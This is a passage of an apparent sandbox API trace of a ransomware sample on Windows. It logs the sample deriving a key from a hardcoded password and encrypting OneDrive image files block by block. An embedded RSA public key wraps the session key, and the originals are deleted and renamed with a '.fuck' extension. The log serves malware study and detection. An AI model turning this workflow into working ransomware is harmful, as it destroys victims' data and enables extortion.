hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.580] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.580] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.580] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.580] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.581] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.581] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.581] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.581] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.581] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.581] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.582] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.582] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.582] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.582] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x331, lpOverlapped=0x0) returned 1 [0277.582] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x331, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x340) returned 1 [0277.582] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x340, lpOverlapped=0x0) returned 1 [0277.583] CloseHandle (hObject=0x5d48) returned 1 [0277.583] CloseHandle (hObject=0x5d3c) returned 1 [0277.583] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg"), bFailIfExists=0) returned 1 [0277.587] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg", dwFileAttributes=0x0) returned 1 [0277.587] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg.gsg")) returned 1 [0277.589] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_documents.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_documents.svg.fuck")) returned 1 [0277.590] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.590] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.590] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.590] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.590] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.590] GetLastError () returned 0x0 [0277.591] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg")) returned 0x20 [0277.591] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg", dwFileAttributes=0x80) returned 1 [0277.591] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.592] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.593] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder_image_pictures.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.594] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.596] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.596] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.596] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.596] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.596] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.596] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.596] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ca50) returned 1 [0277.597] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ca50, dwCertEncodingType=0x1, pInfo=0x2f34f40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34f70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34f78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbb88) returned 1 [0277.597] CryptEncrypt (in: hKey=0x2fbb88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.597] CryptEncrypt (in: hKey=0x2fbb88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c0c0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c0c0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c0c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c0c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.606] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.606] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, 